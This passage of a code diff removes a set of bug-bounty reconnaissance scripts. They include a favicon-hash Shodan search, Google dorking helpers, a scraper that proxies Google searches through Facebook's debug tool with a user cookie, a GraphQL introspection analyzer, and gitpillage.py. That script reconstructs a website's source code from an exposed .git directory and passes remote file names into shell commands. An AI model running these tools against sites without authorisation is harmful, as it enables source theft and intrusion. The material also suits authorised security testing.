    28  -| _| (_| |\ V /| | (_| (_) | | | | | | | | (_| \__ \ | | | |_| | | | (__| < _ | |_) | |_| |
    29  -|_| \__,_| \_/ |_|\___\___/|_| |_| |_| |_|\__,_|___/_| |_|\__|_| |_|\___|_|\_\ (_) | .__/ \__, |
    30  - |_| |___/
    31  - 
    32  - by @gwendallecoguic
    33  - 
    34  -""")
    35  - pass
    36  - 
    37  - 
    38  -def faviconHash( data, web ):
    39  - if web:
    40  - b64data = base64.encodebytes(data).decode()
    41  - else:
    42  - b64data = base64.encodebytes(data)
    43  - 
    44  - b64data = base64.encodebytes(data).decode()
    45  - return mmh3.hash(b64data)
    46  - 
    47  - 
    48  -parser = argparse.ArgumentParser()
    49  -parser.add_argument( "-b","--favfile64",help="favicon source file (base64 format)" )
    50  -parser.add_argument( "-f","--favfile",help="favicon source file" )
    51  -parser.add_argument( "-u","--favurl",help="favicon source url" )
    52  -parser.add_argument( "-k","--shokey",help="Shodan API key" )
    53  -parser.add_argument( "-v","--values",help="values you want separated by comma, default: ip _str, can by: ip_str,http,data,domains,hash,ssl,timestamp,asn,_shodan,transport,os,isp,port,org,ip,tags,hostnames,location" )
    54  -parser.add_argument( "-s","--silent",help="silent mode, only results displayed", action="store_true" )
    55  - 
    56  -parser.parse_args()
    57  -args = parser.parse_args()
    58  - 
    59  -if not args.silent:
    60  - banner()
    61  - 
    62  -if args.values:
    63  - t_values = args.values.split(',')
    64  -else:
    65  - t_values = ['ip_str']
    66  - 
    67  -if args.shokey:
    68  - shokey = args.shokey
    69  -else:
    70  - shokey = False
    71  - 
    72  -if args.favfile64:
    73  - favsource = args.favfile64
    74  - data = open(favsource).read()
    75  - data = data.replace( "\n", '' )
    76  - data = re.sub( 'data:.*;base64,', '', data )
    77  - data = base64.b64decode( data )
    78  - web_src = False
    79  - 
    80  -if args.favfile:
    81  - favsource = args.favfile
    82  - data = open(favsource,'rb').read()
    83  - web_src = False
    84  - 
    85  -if args.favurl:
    86  - favsource = args.favurl
    87  - try:
    88  - r = requests.get( favsource, timeout=3, verify=False )
    89  - except Exception as e:
    90  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    91  - exit()
    92  - data = r.content
    93  - web_src = True
    94  - 
    95  -if not args.favfile64 and not args.favfile and not args.favurl:
    96  - parser.error( 'missing favicon' )
    97  - 
    98  -if not args.silent:
    99  - sys.stdout.write( '%s[+] load favicon source: %s%s\n' % (fg('green'),favsource,attr(0)) )
    100  - sys.stdout.write( '[+] favicon size: %d\n' % len(data) )
    101  - 
    102  -if not len(data):
    103  - if not args.silent:
    104  - sys.stdout.write( '%s[-] invalid favicon%s\n' % (fg('red'),attr(0)) )
    105  - exit()
    106  - 
    107  -favhash = faviconHash( data, web_src )
    108  -if not args.silent:
    109  - sys.stdout.write( '%s[+] hash calculated: %s%s\n' % (fg('green'),str(favhash),attr(0)) )
    110  - 
    111  -if shokey:
    112  - shodan = Shodan( shokey )
    113  - search = 'http.favicon.hash:' + str(favhash)
    114  - if not args.silent:
    115  - sys.stdout.write( '[+] searching: %s\n' % search )
    116  - try:
    117  - t_results = shodan.search( search )
    118  - # print(t_results)
    119  - except Exception as e:
    120  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    121  - exit()
    122  - if not args.silent:
    123  - sys.stdout.write( '%s[+] %d results found%s\n' % (fg('green'),len(t_results['matches']),attr(0)) )
    124  - for result in t_results['matches']:
    125  - tmp = []
    126  - for v in t_values:
    127  - if v in result:
    128  - tmp.append( str(result[v]) )
    129  - else:
    130  - tmp.append( '' )
    131  - # print( tmp )
    132  - sys.stdout.write( "%s\n" % ' - '.join(tmp) )
    133  - 
    134  - 
  • ■ ■ ■ ■ ■ ■
    filterurls.py
    1 1  #!/usr/bin/python3
    2 2   
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6 3  import os
    7 4  import sys
    8 5  import re
    skipped 459 lines
  • ■ ■ ■ ■ ■ ■
    finddl.sh
    1  -#!/bin/bash
    2  - 
    3  - 
    4  -NC='\033[0m'
    5  -BLACK='0;30'
    6  -RED='0;31'
    7  -GREEN='0;32'
    8  -ORANGE='0;33'
    9  -BLUE='0;34'
    10  -PURPLE='0;35'
    11  -CYAN='0;36'
    12  -LIGHT_GRAY='0;37'
    13  -DARK_GRAY='1;30'
    14  -LIGHT_RED='1;31'
    15  -LIGHT_GREEN='1;32'
    16  -YELLOW='1;33'
    17  -LIGHT_BLUE='1;34'
    18  -LIGHT_PURPLE='1;35'
    19  -LIGHT_CYAN='1;36'
    20  -WHITE='1;37'
    21  - 
    22  - 
    23  -function _print() {
    24  - if [ -n "$2" ] ; then
    25  - c=$2
    26  - else
    27  - c='WHITE'
    28  - fi
    29  - 
    30  - color="\033[${!c}m"
    31  - printf ${color}"$1"
    32  - printf ${NC}
    33  -}
    34  - 
    35  - 
    36  -function usage() {
    37  - echo "Usage: "$0" <domain file>"
    38  - if [ -n "$1" ] ; then
    39  - echo "Error: "$1"!"
    40  - fi
    41  - exit
    42  -}
    43  - 
    44  - 
    45  -if ! [ $# -eq 1 ] ; then
    46  - usage
    47  -fi
    48  - 
    49  -file=$1
    50  - 
    51  -if ! [ -f $file ] ; then
    52  - usage "File not found"
    53  -fi
    54  - 
    55  -method="GET"
    56  -user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.7.1"
    57  -url="https://www.google.fr/search?sourceid=chrome-psyapi2&ion=1&espv=2&ie=UTF-8&q=intitle%3A%22index%20of%22%20site%3A"
    58  -str="aucun document"
    59  -str="environ"
    60  - 
    61  -for d in $(cat $file) ; do
    62  - u=${url}${d}
    63  - #echo $u
    64  - cmd="curl -i -s -k -L -X $method -H \"$user_agent\" $u | grep -i \"$str\""
    65  - echo $cmd
    66  - #exit
    67  - go=$($cmd)
    68  - echo $go
    69  - if [ -n "$go" ] ; then
    70  - color="GREEN"
    71  - else
    72  - color="DARK_GRAY"
    73  - fi
    74  - _print $d $color
    75  - echo ""
    76  - #wait 1
    77  -done
    78  - 
    79  -exit
    80  - 
  • ■ ■ ■ ■ ■ ■
    gg-extract-links.php
    1  -#!/usr/bin/php
    2  -<?php
    3  - 
    4  -function usage( $err=null ) {
    5  - echo 'Usage: '.$_SERVER['argv'][0]." <source file>\n";
    6  - if( $err ) {
    7  - echo 'Error: '.$err."\n";
    8  - }
    9  - exit();
    10  -}
    11  - 
    12  -if( $_SERVER['argc'] != 2 ) {
    13  - usage();
    14  -}
    15  - 
    16  -$src = $_SERVER['argv'][1];
    17  -if( !is_file($src) ) {
    18  - usage( 'cannot find source file !' );
    19  -}
    20  -$content = file_get_contents( $_SERVER['argv'][1] );
    21  -$content = urldecode( html_entity_decode($content) );
    22  -//var_dump( $content );
    23  - 
    24  -$t_links = [];
    25  - 
    26  -$doc = new DOMDocument();
    27  -$doc->preserveWhiteSpace = false;
    28  -@$doc->loadHTML( $content );
    29  - 
    30  -$xpath = new DOMXPath( $doc );
    31  -//$t_result = $xpath->query("//*[@class='r']/a");
    32  -$t_result = $xpath->query("//h3//a[@href]");
    33  -//var_dump( $t_result );
    34  -//exit();
    35  - 
    36  -foreach( $t_result as $r )
    37  -{
    38  - $lnk = $r->ownerDocument->saveHTML( $r );
    39  - preg_match_all( '#href="([^"]*)"#', $lnk, $tmp );
    40  - $full_url = str_ireplace( '/url?q=', '', $tmp[1][0] );
    41  - //var_dump( $full_url );
    42  - $t_info = parse_url( $full_url );
    43  - //var_dump( $t_info );
    44  - 
    45  - $t_links[] = $full_url;
    46  -
    47  - /*$a = preg_match( '#(.*)\.s3.amazonaws\.com#', $t_info['host'], $m );
    48  -
    49  - if( $a ) {
    50  - $t_buckets[] = $m[1];
    51  - } else {
    52  - $tmp = explode( '/', $t_info['path'] );
    53  - $t_buckets[] = $tmp[1];
    54  - }*/
    55  -}
    56  - 
    57  - 
    58  -echo implode( "\n", $t_links )."\n";
    59  - 
    60  -exit();
    61  - 
    62  -?>
  • ■ ■ ■ ■ ■ ■
    gitpillage.py
    1  -#!/usr/bin/python3
    2  - 
    3  - 
    4  -# inspired by https://github.com/koto/gitpillage/blob/master/gitpillage.sh
    5  -# example: python3 gitpillage.py -u https://www.example.com -t 10
    6  - 
    7  -# I don't believe in license.
    8  -# You can do whatever you want with this program.
    9  - 
    10  - 
    11  -#
    12  -### functions
    13  -#
    14  -def downloadFile( url ):
    15  - try:
    16  - r = requests.get( url, timeout=3, verify=False )
    17  - return r
    18  - except Exception as e:
    19  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    20  - return False
    21  - 
    22  - 
    23  -def downloadOject( t_extension, t_exclude, file ):
    24  - sys.stdout.write( 'progress: %d/%d\r' % (t_multiproc['n_current'],t_multiproc['n_total']) )
    25  - t_multiproc['n_current'] = t_multiproc['n_current'] + 1
    26  - 
    27  - file = file.strip()
    28  - if not len(file):
    29  - return False
    30  - 
    31  - # 0: object_id , 1: real filename
    32  - tmp = file.split(':')
    33  - object_id = tmp[0]
    34  - real_filename = tmp[1]
    35  - ext = real_filename.split('.')[-1]
    36  - # print(ext)
    37  - 
    38  - # make the test easier to read/understand
    39  - if len(t_extension):
    40  - if ext in t_extension:
    41  - go = True
    42  - else:
    43  - go = False
    44  - 
    45  - if len(t_exclude):
    46  - if ext in t_exclude:
    47  - go = False
    48  - else:
    49  - go = True
    50  - 
    51  - if not go:
    52  - if t_multiproc['verbose']:
    53  - sys.stdout.write( "%s[*] skip extension: %s%s\n" % (fg('dark_gray'),real_filename,attr(0)) )
    54  - return False
    55  - 
    56  - u = git_url + '/objects/' + object_id[0:2] + '/' + object_id[2:]
    57  - # print(u)
    58  - r = downloadFile( u )
    59  - 
    60  - if type(r) is bool:
    61  - if t_multiproc['verbose']:
    62  - sys.stdout.write( "%s[-] %s%s\n" % (fg('dark_gray'),u,attr(0)) )
    63  - return False
    64  - 
    65  - if not r.status_code == 200:
    66  - if t_multiproc['verbose']:
    67  - sys.stdout.write( "%s[-] %s (%d)%s\n" % (fg('dark_gray'),u,r.status_code,attr(0)) )
    68  - return False
    69  - 
    70  - filename = saveObject( output_dir, object_id, r.content )
    71  - real_filename = output_dir + '/' + real_filename
    72  - 
    73  - try:
    74  - cmd = 'cd ' + output_dir + '; git checkout ' + tmp[1]
    75  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    76  - t_multiproc['n_success'] = t_multiproc['n_success'] + 1
    77  - display = "[+] %s (%d) %s-> %s (%d)%s\n" % (u,r.status_code,fg('cyan'),real_filename,len(r.content),attr(0))
    78  - except Exception as e:
    79  - if t_multiproc['verbose']:
    80  - display = "[-] %s (%d) %s-> %s%s\n" % (u,r.status_code,fg('yellow'),e,attr(0))
    81  - return False
    82  - 
    83  - sys.stdout.write( display )
    84  - 
    85  - 
    86  -def saveObject( output_dir, object_id, content ):
    87  - dirname = output_dir + '/.git/objects/'+ object_id[0:2]
    88  - filename = dirname + '/' + object_id[2:]
    89  - # print(filename)
    90  - 
    91  - if not os.path.isdir(dirname):
    92  - try:
    93  - os.makedirs( dirname )
    94  - except Exception as e:
    95  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    96  - return False
    97  - 
    98  - fp = open( filename, 'wb')
    99  - fp.write( content )
    100  - fp.close()
    101  - 
    102  - return filename
    103  -#
    104  -###
    105  -#
    106  - 
    107  - 
    108  -import os
    109  -import sys
    110  -import argparse
    111  -import requests
    112  -import subprocess
    113  -from functools import partial
    114  -from urllib.parse import urlparse
    115  -from colored import fg, bg, attr
    116  -from multiprocessing.dummy import Pool
    117  - 
    118  - 
    119  -# disable "InsecureRequestWarning: Unverified HTTPS request is being made."
    120  -from requests.packages.urllib3.exceptions import InsecureRequestWarning
    121  -requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    122  - 
    123  - 
    124  -#
    125  -### variables
    126  -#
    127  -max_threads = 5
    128  -t_extension = []
    129  -t_exclude = ['png','gif','jpg','jpeg','ico','svg','eot','otf','ttf','woff','woff2','css','sass','less','po','mo','mp3','mp4','mpeg','avi']
    130  - 
    131  -parser = argparse.ArgumentParser()
    132  -parser.add_argument( "-u","--url",help="url of the .git, example https://www.target.com/.git" )
    133  -parser.add_argument( "-t","--threads",help="threads, default: 5" )
    134  -parser.add_argument( "-e","--extension",help="extensions to download separated by comma, overwrite --exclude, default: all but default exclude" )
    135  -parser.add_argument( "-x","--exclude",help="extensions to exclude separated by comma, default: "+','.join(t_exclude) )
    136  -parser.add_argument( "-v","--verbose",help="verbose mode, default: off", action="store_true" )
    137  -parser.parse_args()
    138  -args = parser.parse_args()
    139  - 
    140  -if args.url:
    141  - url = args.url
    142  - # url = args.url.strip('/')
    143  -else:
    144  - parser.error( 'url list missing' )
    145  - 
    146  -if args.threads:
    147  - max_threads = int(args.threads)
    148  - 
    149  -if args.exclude:
    150  - t_extension = []
    151  - t_exclude = args.exclude.split(',')
    152  - 
    153  -if args.extension:
    154  - t_extension = args.extension.split(',')
    155  - t_exclude = []
    156  - 
    157  -if not url.startswith( 'http' ):
    158  - url = 'https://'+url
    159  - 
    160  -if args.verbose:
    161  - verbose = True
    162  -else:
    163  - verbose = False
    164  - 
    165  -git_url = url
    166  -t_url_parse = urlparse( url )
    167  -output_dir = os.getcwd() + '/' + t_url_parse.netloc
    168  -#
    169  -###
    170  -#
    171  - 
    172  - 
    173  -#
    174  -### init
    175  -#
    176  -if not os.path.isdir(output_dir):
    177  - try:
    178  - os.makedirs( output_dir )
    179  - except Exception as e:
    180  - sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    181  - exit()
    182  - 
    183  -sys.stdout.write( "%s[+] output directory: %s%s\n" % (fg('green'),output_dir,attr(0)) )
    184  - 
    185  - 
    186  -try:
    187  - cmd = 'cd ' + output_dir + '; git init'
    188  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    189  - sys.stdout.write( "[+] %s\n" % output.strip() )
    190  -except Exception as e:
    191  - sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    192  - sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    193  - exit()
    194  -#
    195  -###
    196  -#
    197  - 
    198  - 
    199  -#
    200  -### create local repository
    201  -#
    202  -u = git_url + '/index'
    203  -r = downloadFile( u )
    204  -if not r:
    205  - sys.stdout.write( "%s[-] cannot find index file: %s%s\n" % (fg('red'),u,attr(0)) )
    206  - exit()
    207  -sys.stdout.write( "%s[+] index file found: %s%s\n" % (fg('green'),u,attr(0)) )
    208  - 
    209  -fp = open( output_dir+'/.git/index', 'wb' )
    210  -fp.write( r.content )
    211  -fp.close()
    212  - 
    213  -try:
    214  - cmd = 'cd ' + output_dir + '; git ls-files --stage | awk \'{print $2":"$4}\''
    215  - output = subprocess.check_output( cmd, stderr=subprocess.STDOUT, shell=True ).decode('utf-8')
    216  - t_ls_files = output.split("\n")
    217  -except Exception as e:
    218  - sys.stdout.write( "%s[-] error occurred, cannot initialize repository%s\n" % (fg('red'),attr(0)) )
    219  - sys.stdout.write( "%s[-] %s%s\n" % (fg('red'),e,attr(0)) )
    220  - exit()
    221  -#
    222  -###
    223  -#
    224  - 
    225  - 
    226  -#
    227  -### main loop
    228  -#
    229  -t_multiproc = {
    230  - 'n_current': 0,
    231  - 'n_total': len(t_ls_files),
    232  - 'n_success': 0,
    233  - 'verbose': verbose,
    234  -}
    235  - 
    236  -pool = Pool( max_threads )
    237  -pool.map( partial(downloadOject,t_extension,t_exclude), t_ls_files )
    238  -pool.close()
    239  -pool.join()
    240  -#
    241  -###
    242  -#
    243  - 
    244  - 
    245  -sys.stdout.write( "%s[+] %d files successfully downloaded%s\n" % (fg('green'),t_multiproc['n_success'],attr(0)) )
    246  - 
  • ■ ■ ■ ■ ■ ■
    google-search.py
    1  -#!/usr/bin/python3
    2  - 
    3  -import os
    4  -import sys
    5  -import json
    6  -import argparse
    7  -import urllib.parse
    8  -from goop import goop
    9  -from functools import partial
    10  -from multiprocessing.dummy import Pool
    11  -from colored import fg, bg, attr
    12  - 
    13  -def banner():
    14  - print("""
    15  - _ _
    16  - __ _ ___ ___ __ _| | ___ ___ ___ __ _ _ __ ___| |__ _ __ _ _
    17  - / _` |/ _ \ / _ \ / _` | |/ _ \ / __|/ _ \/ _` | '__/ __| '_ \ | '_ \| | | |
    18  -| (_| | (_) | (_) | (_| | | __/ \__ \ __/ (_| | | | (__| | | | _ | |_) | |_| |
    19  - \__, |\___/ \___/ \__, |_|\___| |___/\___|\__,_|_| \___|_| |_| (_) | .__/ \__, |
    20  - |___/ |___/ |_| |___/
    21  - 
    22  - by @gwendallecoguic
    23  - 
    24  -""")
    25  - pass
    26  - 
    27  -parser = argparse.ArgumentParser()
    28  -parser.add_argument( "-b","--nobanner",help="disable the banner", action="store_true" )
    29  -parser.add_argument( "-f","--file",help="source file that contains the dorks" )
    30  -parser.add_argument( "-t","--term",help="search term", action="append" )
    31  -parser.add_argument( "-d","--decode",help="urldecode the results", action="store_true" )
    32  -parser.add_argument( "-e","--endpage",help="search end page, default 50" )
    33  -parser.add_argument( "-s","--startpage",help="search start page, default 0" )
    34  -parser.add_argument( "-c","--fbcookie",help="your facebook cookie" )
    35  -parser.add_argument( "-o","--output",help="output file" )
    36  -parser.add_argument( "-n","--numbers-only",help="don't display the results but how many results where found", action="store_true" )
    37  - 
    38  - 
    39  -parser.parse_args()
    40  -args = parser.parse_args()
    41  - 
    42  -if not args.nobanner:
    43  - banner()
    44  - 
    45  -if args.startpage:
    46  - start_page = int(args.startpage)
    47  -else:
    48  - start_page = 0
    49  - 
    50  -if args.endpage:
    51  - end_page = int(args.endpage)
    52  -else:
    53  - end_page = 50
    54  - 
    55  -if args.fbcookie:
    56  - fb_cookie = args.fbcookie
    57  -else:
    58  - fb_cookie = os.getenv('FACEBOOK_COOKIE')
    59  -if not fb_cookie:
    60  - parser.error( 'facebook cookie is missing' )
    61  - 
    62  -if args.file:
    63  - if os.path.isfile(args.file):
    64  - fp = open( args.file, 'r' )
    65  - t_terms = fp.read().split('\n')
    66  - fp.close()
    67  - else:
    68  - parser.error( '%s file not found' % args.file )
    69  -elif args.term:
    70  - t_terms = args.term
    71  -else:
    72  - parser.error( 'term is missing' )
    73  - 
    74  -if args.output:
    75  - numbers_only = True
    76  -else:
    77  - numbers_only = False
    78  - 
    79  -if args.numbers_only:
    80  - numbers_only = True
    81  -else:
    82  - numbers_only = False
    83  - 
    84  -if args.decode:
    85  - urldecode = True
    86  -else:
    87  - urldecode = False
    88  - 
    89  -# print(fb_cookie)
    90  - 
    91  -def doMultiSearch( term, numbers_only, urldecode, page ):
    92  - zero_result = 0
    93  - for i in range(page-5,page-1):
    94  - if i != page and i in page_history and page_history[i] == 0:
    95  - zero_result = zero_result + 1
    96  - 
    97  - if zero_result < 3:
    98  - s_results = goop.search( term, fb_cookie, page, True )
    99  - # print(s_results)
    100  - # print(s_results)
    101  - page_history[page] = len(s_results)
    102  - if not numbers_only:
    103  - for i in s_results:
    104  - if urldecode:
    105  - print( urllib.parse.unquote(s_results[i]['url']) )
    106  - else:
    107  - print( s_results[i]['url'] )
    108  - else:
    109  - for i in range(page,end_page):
    110  - page_history[i] = 0
    111  - 
    112  -for term in t_terms:
    113  - page_history = {}
    114  - 
    115  - pool = Pool( 5 )
    116  - pool.map( partial(doMultiSearch,term,numbers_only,urldecode), range(start_page,end_page) )
    117  - pool.close()
    118  - pool.join()
    119  - 
    120  - if numbers_only:
    121  - n_results = sum( page_history.values() )
    122  - if n_results:
    123  - color = 'white'
    124  - else:
    125  - color = 'dark_gray'
    126  - 
    127  - full_url = 'https://www.google.com/search?q=' + urllib.parse.quote(term)
    128  - sys.stdout.write( '%s%s (%d)%s\n' % (fg(color),full_url,n_results,attr(0)) )
    129  - 
  • ■ ■ ■ ■ ■ ■
    goop/__init__.py
    1  -__version__ = '0.1.1'
    2  - 
  • ■ ■ ■ ■ ■ ■
    goop/goop.py
    1  -import re
    2  -import requests
    3  - 
    4  -try:
    5  - from urllib.parse import quote_plus as url_encode
    6  -except ImportError:
    7  - from urllib import quote_plus as url_encode
    8  - 
    9  -def decode_html(string):
    10  - "decode common html/xml entities"
    11  - new_string = string
    12  - decoded = ['>', '<', '"', '&', '\'']
    13  - encoded = ['&gt;', '&lt;', '&quot;', '&amp;', '&#039;']
    14  - for e, d in zip(encoded, decoded):
    15  - new_string = new_string.replace(e, d)
    16  - for e, d in zip(encoded[::-1], decoded[::-1]):
    17  - new_string = new_string.replace(e, d)
    18  - return new_string
    19  - 
    20  -def parse(string):
    21  - "extract and parse resutls"
    22  - parsed = {}
    23  -# pattern = r'''<div><div class="[^"]+">
    24  -# <div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+"><div class="[^"]+">(.*?)</div>
    25  -# <div class="[^"]+">.*?</div></a></div>
    26  -# <div class="[^"]+"></div>
    27  -# <div class="[^"]+"><div><div class="[^"]+"><div><div><div class="[^"]+">(?:(.*?)(?: ...)?</div>|\n<span class="[^"]+">.*?</span><span class="[^"]+">.*?</span>(.*?)</div>)'''
    28  - pattern = r'''<div class="[^"]+"><a href="/url\?q=(.+?)&sa=[^"]+">'''
    29  - matches = re.finditer(pattern, string)
    30  - num = 0
    31  - for match in matches:
    32  - # parsed[num] = {'url' : match.group(1), 'text' : match.group(2), 'summary' : match.group(3) or match.group(4)}
    33  - parsed[num] = {'url' : match.group(1), 'text' : '', 'summary' : ''}
    34  - num += 1
    35  - return parsed
    36  - 
    37  -def search(query, cookie, page=0, full=False):
    38  - """
    39  - main function, returns parsed results
    40  - Args:
    41  - query - search string
    42  - cookie - facebook cookie
    43  - page - search result page number (optional)
    44  - """
    45  - offset = page * 10
    46  - filter = 1 if not full else 0
    47  - escaped = url_encode('https://google.com/search?q=%s&start=%i&filter=%i' % (url_encode(query), offset, filter))
    48  - headers = {
    49  - 'Host': 'developers.facebook.com',
    50  - 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
    51  - 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    52  - 'Accept-Language': 'en-US,en;q=0.5',
    53  - 'Accept-Encoding': 'deflate',
    54  - 'Connection': 'keep-alive',
    55  - 'Cookie': cookie,
    56  - 'Upgrade-Insecure-Requests': '1',
    57  - 'Cache-Control': 'max-age=0',
    58  - 'TE': 'Trailers'
    59  - }
    60  - response = requests.get('https://developers.facebook.com/tools/debug/echo/?q=%s' % escaped, headers=headers)
    61  - cleaned_response = decode_html(response.text)
    62  - parsed = parse(cleaned_response)
    63  - return parsed
    64  - 
  • ■ ■ ■ ■ ■ ■
    graphql-introspection-analyzer.py
    1  -#!/usr/bin/python2
    2  - 
    3  -import sys
    4  -import os
    5  -import json
    6  -from termcolor import colored
    7  -from operator import attrgetter
    8  - 
    9  - 
    10  - 
    11  -def banner():
    12  - print("""
    13  - _ _ _
    14  - __ _ _ __ __ _ _ __ | |__ __ _| | __ _ _ __ __ _| |_ _ _______ _ __
    15  - / _` | '__/ _` | '_ \| '_ \ / _` | | / _` | '_ \ / _` | | | | |_ / _ \ '__|
    16  - | (_| | | | (_| | |_) | | | | (_| | | | (_| | | | | (_| | | |_| |/ / __/ |
    17  - \__, |_| \__,_| .__/|_| |_|\__, |_| \__,_|_| |_|\__,_|_|\__, /___\___|_|
    18  - |___/ |_| |_| |___/
    19  - 
    20  - by @gwendallecoguic
    21  - 
    22  -""")
    23  - pass
    24  - 
    25  -banner()
    26  - 
    27  - 
    28  - 
    29  -class GraphqlObject:
    30  - name = ""
    31  - ttype = ""
    32  - args = []
    33  - attrs = []
    34  - values = []
    35  - inputs = []
    36  - 
    37  - def __init__( self ):
    38  - self.args = []
    39  - self.attrs = []
    40  - self.values = []
    41  - self.inputs = []
    42  - 
    43  -class GraphqlAttribut:
    44  - name = ""
    45  - ttype = ""
    46  - 
    47  -class GraphqlArgument:
    48  - name = ""
    49  - ttype = ""
    50  - 
    51  -class GraphqlValue:
    52  - name = ""
    53  - 
    54  - 
    55  -def usage( err='' ):
    56  - print( "1/ First step is to run the introspection query on the server, and store the JSON returned in a file.\n")
    57  - print( "GET:")
    58  - print( "/graphql?query={__schema{queryType{name},mutationType{name},subscriptionType{name},types{...FullType},directives{name,description,locations,args{...InputValue}}}},fragment%20FullType%20on%20__Type{kind,name,description,fields(includeDeprecated:true){name,description,args{...InputValue},type{...TypeRef},isDeprecated,deprecationReason},inputFields{...InputValue},interfaces{...TypeRef},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason},possibleTypes{...TypeRef}},fragment%20InputValue%20on%20__InputValue{name,description,type{...TypeRef},defaultValue},fragment%20TypeRef%20on%20__Type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}\n")
    59  - print( "POST:")
    60  - print( '{"query":"{__schema{queryType{name},mutationType{name},subscriptionType{name},types{...FullType},directives{name,description,locations,args{...InputValue}}}},fragment FullType on __Type{kind,name,description,fields(includeDeprecated:true){name,description,args{...InputValue},type{...TypeRef},isDeprecated,deprecationReason},inputFields{...InputValue},interfaces{...TypeRef},enumValues(includeDeprecated:true){name,description,isDeprecated,deprecationReason},possibleTypes{...TypeRef}},fragment InputValue on __InputValue{name,description,type{...TypeRef},defaultValue},fragment TypeRef on __Type{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name,ofType{kind,name}}}}}}}}","variables":{}}\n')
    61  - print( "2/ Then run this program.\n")
    62  - print( "Usage: %s <introspection file>" % sys.argv[0] )
    63  - if err:
    64  - print( "Error: %s!" % err )
    65  - print("")
    66  - sys.exit()
    67  - 
    68  - 
    69  -def displayTypeO( o ):
    70  - sys.stdout.write( colored("%s" % o.ttype, t_colors[o.ttype] if o.ttype in t_colors else default_color ) )
    71  - sys.stdout.write( " %s {\n" % o.name )
    72  - 
    73  - if len(o.attrs):
    74  - l = sorted( o.attrs, key=lambda w:attrgetter('name')(w).lower() )
    75  - for elt in l:
    76  - sys.stdout.write( " %s" % elt.name )
    77  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    78  - if not elt == l[-1]:
    79  - sys.stdout.write( "," )
    80  - sys.stdout.write( "\n" )
    81  - if len(o.inputs):
    82  - l = sorted( o.inputs, key=lambda w:attrgetter('name')(w).lower() )
    83  - for elt in l:
    84  - sys.stdout.write( " %s" % elt.name )
    85  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    86  - if not elt == l[-1]:
    87  - sys.stdout.write( "," )
    88  - sys.stdout.write( "\n" )
    89  - if len(o.values):
    90  - l = sorted( o.values, key=lambda w:attrgetter('name')(w).lower() )
    91  - for elt in l:
    92  - sys.stdout.write( " %s" % elt.name )
    93  - if not elt == l[-1]:
    94  - sys.stdout.write( "," )
    95  - sys.stdout.write( "\n" )
    96  - 
    97  - sys.stdout.write( "}\n\n" )
    98  - 
    99  - 
    100  -def displayTypeQM( o ):
    101  - sys.stdout.write( colored("%s" % o.ttype, t_colors[o.ttype] if o.ttype in t_colors else default_color ) )
    102  - sys.stdout.write( " %s (\n" % o.name )
    103  - 
    104  - if len(o.args):
    105  - l = sorted( o.args, key=lambda w:attrgetter('name')(w).lower() )
    106  - for elt in l:
    107  - sys.stdout.write( " %s" % elt.name )
    108  - sys.stdout.write( colored(" %s" % elt.ttype, 'white') )
    109  - if not elt == l[-1]:
    110  - sys.stdout.write( "," )
    111  - sys.stdout.write( "\n" )
    112  - 
    113  - sys.stdout.write( ")\n\n" )
    114  - 
    115  - 
    116  -# this is a list
    117  -t_keywords = [
    118  - 'Query','Mutation',
    119  - 'Boolean','String','ID','Float','Int',
    120  - '__Schema','__Type','__Field','__Directive','__EnumValue','__InputValue','__TypeKind','__DirectiveLocation'
    121  -]
    122  - 
    123  -# this is a dict
    124  -t_colors = {
    125  - 'QUERY': 'cyan',
    126  - 'MUTATION': 'red',
    127  - 'ENUM': 'yellow',
    128  - 'INTERFACE': 'blue',
    129  -};
    130  - 
    131  -default_color = 'green'
    132  - 
    133  -t_objects = [];
    134  -t_queries = [];
    135  -t_mutations = [];
    136  - 
    137  - 
    138  -if len(sys.argv) != 2:
    139  - usage( 'introspection file not found' )
    140  - 
    141  -ifile = sys.argv[1]
    142  - 
    143  -if not os.path.isfile(ifile):
    144  - usage( 'introspection file not found' )
    145  - 
    146  -with open(ifile) as jfile:
    147  - data = json.load( jfile )
    148  - for v in data['data']['__schema']['types']:
    149  - if v['name'] == 'Query' or v['name'] == 'Mutation':
    150  - if 'fields' in v and type(v['fields']) is list and len(v['fields'])>0:
    151  - for vv in v['fields']:
    152  - o = GraphqlObject()
    153  - o.name = vv['name']
    154  - o.ttype = 'QUERY' if v['name'] == 'Query' else 'MUTATION';
    155  - 
    156  - if 'args' in vv and type(vv['args']) is list and len(vv['args'])>0:
    157  - for vvv in vv['args']:
    158  - if vvv['type']['name']:
    159  - ttype = vvv['type']['name']
    160  - elif vvv['type']['ofType']['name']:
    161  - ttype = vvv['type']['ofType']['name']
    162  - elif vvv['type']['ofType']['ofType']['name']:
    163  - ttype = vvv['type']['ofType']['ofType']['name']
    164  - elif vvv['type']['ofType']['ofType']['ofType']['name']:
    165  - ttype = vvv['type']['ofType']['ofType']['ofType']['name']
    166  - arg = GraphqlArgument()
    167  - arg.name = vvv['name']
